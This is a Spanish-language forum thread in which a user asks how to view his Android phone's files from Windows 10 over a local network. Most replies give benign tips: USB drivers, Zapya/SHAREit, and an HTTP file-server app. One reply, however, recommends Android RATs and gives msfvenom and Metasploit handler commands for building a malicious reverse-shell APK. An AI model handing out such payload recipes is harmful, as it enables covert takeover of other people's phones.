conexíón w10 y android red local

Iniciado por selohu, Octubre 27, 2018, 10:45:54 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 27, 2018, 10:45:54 AM Ultima modificación: Octubre 27, 2018, 12:05:50 PM por Gabriela
Hola, tengo conectado mi android con red local y mi w10, que tendría que hacer para ver mi android por w10?.

Gracias

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si lo que quieres es tener el control remoto de android desde otro dispositivo puedes usar una aplicacion/programa para esto.

Puedes usar una herramienta de administracion remota o puedes usar metasploit framework.

Herramientas de administración remota: Droidjack, SpyNote, Ahmyth, entre otros.

Puedes usar estos programas facilmente desde una interfaz GUI.

Metasploit framework: Hay miles de guias de como acceder a un dispositivo con Sistema operativo Android desde metasploit.

Tendras que apredenderte los comandos (por lo menos los escenciales) para usarlo.

Mini-guia de metasploit framework:

Para generar un .APK malicioso usamos msfvenom:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<tu direccion ip o nombre del host> LPORT=<puerto a conectar> -o <nombre del apk>

Abrimos metasploit y esperamos que cargue:

msfconsole

una vez en la consola de metasploit:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <la ip/host que usastes para generar la carga util>
set lport <el puerto que se pondra en escucha de una conexion>
exploit

esperas a que se ejecute el .apk malicioso y tendras una sesion de meterpreter.

Nota: tendras que ver otra guia de como usar meterpreter.

O

En vez de hacer todo aprende programacion y crea un malware para controlar un android.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

@ DtxdF
Va a volver loco al chico. ;D
Que ya de por sí tiene problemas con las conexiones.
----------------------------------------------------------------------------------------------------------

Chico, con sinceridad le digo... yo creí que era bueno...
Me has demostrado que no es así. No he podido ayudarte en tus otros post: con la red, ni con lo del streaming. Mi ego está por el piso; y mi gato se ha ido de casa. Eres duro de pelar; y no ese tonto de Bruce Willis.

Un último intento:

Si lo que quieres es conectar el celular al Pc y acceder a él...

Solo instala los drivers del cell que quieres ver en Windows, y de manera nativa lo verás al conectarlo. A veces Windows lo instala, pero no es norma para todos los modelos.

Busca los drivers en internet.

Ej: (para Samsung) pon en el navegador: Samsung Usb Driver. <<<Buscar.

Si es otro modelo solo ponle el nombre. Escoge una página de confianza para descargar (muy importante): cuidado con los virus.
Es un ejecutable (ejecútalo como administrador).

También hay algunos fabricantes que ofrecen un gestor de conectividad, para a través de él gestionar la info: copiar, borrar, etc.

Suerte.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

jajajaja xD, cualquiera que aprende estas disciplinas tan hermosas (matematicas, ing. electronica, informatica, fisica, etc), nos daremos cuenta que empezaremos a fumarlas y cuando soñemos veremos solo números, letras, codigos, cada proceso y ejecucion que haga un ser humano sabremos como es pero no lo veremos con esa simpleza como se deberia ver. (basicamente una se vuelve loco xD, pero las mejores personas son los que estan locos).

Lo que le dijiste es para un modelo en especifico (servira pero solo para dispositivos samsung), con un RAT sera mas "sencillo".

PD: De cualquier manera servirá y hay muchas opciones, lo que importa es si entiende, pero se que lo hará tarde o temprano.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Octubre 27, 2018, 11:24:20 PM #4 Ultima modificación: Octubre 27, 2018, 11:37:32 PM por AXCESS
Por Wifi (lo anterior era cableado usb).

Use el Zapya para Windows:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

   Y en Android:

(Google Play) o

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Existen otros como SHAREit.

Este funciona muy bien. Aunque tenga en cuenta que pudiera dar conflictos y desconfiguraciones con otros hotspot.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Así es como se aprenden las cosas, probando y probando, y aprovechando la ayuda de los demás. AXCESS Tranquilo en ningún caso miro si eres bueno o no. podéis estar tú y tu gato tranquilos  ;D, y el otro (@ DtxdF)  ;D, me parece genial todo esa parrafada. aunque primero voy a seguir hasta conseguir lo de las conexiones. Aunque si agregas manuales y cosas de lo que me cuentas adelante, sin miedo.  ;D

El que uso es uno que se llama administrador de archivos, una carpeta amarilla. Funciona de lujo y se conecta a la pc por red local. Lo que yo quería es al reves, conectar desde windows al arndroid.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Controlar remotamente un dispositivo con sistema operativo "Windows" instalado?, tambien se puede.

Te puedo indicar como controlarlo remotamente, si deseas en mensajes privados.

Tu solo indícame.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

si, lo se. pero lo que busco es ver los archivos de android del movil en windows. Remotamente de windows a windows se. A no ser que me digas de windows a android. Pero de todas maneras no me serviría nada más que manejar y visualizar. creo yo. Yo lo que quiero probar es analizar el móvil desde windows. Ya que desde android. es como hacerlo desde mi propio windows, si hay algo es fácil que no lo vea si está bien escondido y desde otro equipo es más fácil detectarlo. no?.

Ah ok, tengo tu solucion.

Lo pruebo para hacer respaldos de android's y me funciona a la perfeccion o tambien cuando no quiero instalar drivers para windows cuando tenga que usar android conectandolo via usb.

Una vez instalada la aplicacion en el android que quieras transferir los datos a otra dispositivo (incluido Windows), Al presionar start (una vez abierta la aplicacion), se creara un servidor HTTP y HTTPS (recomiendo que uses este protocolo), indicandote las direcciones url. Puedes colocarle contraseña para que un usuario malintencionado no acceda remotamente a tus archivos.

Nota: no se necesita root

El link del APK en uptodown (confiable):

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Algunas capturas de pantalla pa que vallais bien:





PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Gracias, lo probaré aunque ya tengo uno conectado en red local. Lo que me gustaría es ver en el PC la información como re local de mi móvil no de mi mí móvil lo que hay en mi pc que ya tengo.